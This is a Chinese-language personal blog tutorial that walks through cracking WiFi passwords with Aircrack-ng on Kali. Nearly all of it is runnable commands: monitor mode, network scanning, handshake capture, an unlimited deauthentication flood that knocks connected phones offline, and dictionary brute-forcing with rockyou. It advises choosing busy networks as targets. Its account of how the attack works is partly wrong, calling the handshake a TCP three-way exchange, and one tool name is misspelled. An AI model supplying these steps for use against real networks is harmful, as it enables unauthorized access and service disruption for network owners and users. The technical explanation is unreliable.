Kali学习笔记-用Aircrack-ng抓包破解WiFi密码

2021年7月4日 3894点热度 0人点赞 0条评论

Aircrack-ng是一款非常著名的无线渗透软件,很多人就是因为这款软件才了解到kali这个操作系统,进而打开了渗透的新世界大门。下面是笔者学习Aircrack-ng过程的记录(本文仅供学习交流之用,请勿用于非法活动,由此引发的各种后果与本人无关)。

无论你是物理机还是虚拟机安装的kali,软件的操作过程都是一样的,无非是无线网卡的选择有区别。 如果你的是物理机安装,那就要确保你物理机的无线网卡支持监听和注入模式。如果你是虚拟机安装或物理机的无线网卡不支持监听和注入模式,就需要额外购置一个支持监听和注入模式的USB无线网卡,可以在拼多多或淘宝购买。下面是具体的操作步骤。

因为2020.1a及以后版本的kali做了一些权限上的修改,默认不再是root权限,所以很多命令需要提权运行,即加上sudo,否则会提示无法找到命令。或者也可以直接sudo -i切换到root用户。

打开终端输入如下命令:

sudo ifconfig -a

查看无线网卡是否已经连接好,如果你只有一块无线网卡,一般会显示wlan0,如果显示出wlan0了就是连接好了。

打开无线网卡的监听模式,监听模式打开后会断网。输入如下命令:

sudo airmon-ng start wlan0

可能会提示某些进程可能会导致问题等等,如下图

这时根据提示输入如下命令杀死可能会导致问题的进程:

sudo airmon-ng check kill

输入如下命令查看无线网卡的监听模式是否成功打开:

sudo iwconfig

出现了wlan0mon就表示打开了,接着我们开始搜索附近的WiFi,输入如下命令:

sudo airodump-ng wlan0mon

当找到自己要破解的WiFi后按Ctrl+C停止。

其中

BSSID:WiFi的MAC地址
PWR:信号强弱程度,绝对值越小信号越强
Data:数据量,越大使用的人就越多,建议选择Data数值高的作为攻击目标,这说明有设备连接到了路由器上,抓到包的概率比较高
CH:信道
ESSID:WiFi的名称,中文可能会有乱码。

然后输入如下命令开始抓取握手包:

airodump-ng --bssid BSSID(即WiFi的mac地址) -c 信道 -w 抓包存储的路径 wlan0mon

这里以我家WiFi为例:

sudo airodump-ng --bssid 8C:AB:8E:C0:B5:F0 -c 6 -w /home/max/wifi wlan0mon

注意,如果没有新的设备连进来是无法抓到握手包的,因此我们需要新建另一个终端攻击已经连到这个WiFi的设备,使其下线并重连。新建终端后,输入如下命令:

sudo airepaly-ng -0 0 -c 连接到WiFi的手机mac地址 -a BSSID 网卡名(一般为wlan0mon)

-0 0为用deauth洪水攻击WiFi设备的次数,-0 0为无限次,需要手动按Ctrl+C停止,-0 5则攻击5次后自动停止。攻击原理是:先让设备掉线,设备会再自动连接,并发这个自动连接过程会进行三次握手,会发送tcp包(里面包含加密的密码数据),我方伪装成WiFi热点去窃取该数据包。我方窃取后即可用字典穷举法暴力破解加密的WiFi密码),一般是无限次,因为可以自己手动Ctrl+C停止

以我的手机为例:

sudo aireplay-ng -0 0 -c A8:7D:12:D5:9E:F2 -a 8C:AB:8E:C0:B5:F0 wlan0mon

攻击发起后按Ctrl+C停止

停止后,看另一个终端,因为手机重连需要等一会,所以我们耐心等待一下就好,出现WPA handshake后就表示抓包成功了。

这时我们可以到自己刚才设定的存储路径找到cap包了。至于用什么跑包,可以用kali自带的字典软件跑包,但这太慢了,不过还是要记录一下过程:

解压kali自带的字典文件  路径:/usr/share/wordlists/rockyou.txt.gz 命令如下:

sudo gzip -d /usr/share/wordlists/rockyou.txt.gz

输入如下命令开始破解:

aircrack-ng -w 字典路径 握手包路径

回车后开始破解,如:

sudo aircrack-ng -w /usr/share/wordlists/rockyou.txt /home/max/wifi-01.cap

kali的跑包软件速度比较慢,更推荐用WiFiPR或EWSA来跑包,支持显卡加速,速度非常快,以后会记录一下怎么跑包,用什么字典等。

在抓包完成后,如果需要联网,则需要关闭无线网卡的监听模式:

sudo airmon-ng stop wlan0mon

然后再次输入

sudo iwconfig

可以看到监听模式已经关闭了,wlan0mon变成了wlan0。

但是这时候network manager没有运行

需要手动开启:

sudo service network-manager start(关闭只需要将start换成stop)

这样就顺利开启了

文章参考:
https://blog.csdn.net/weixin_44545251/article/details/100279827
https://blog.csdn.net/qq_41203799/article/details/79945133

麦克斯和雪莉

非常规文科生

文章评论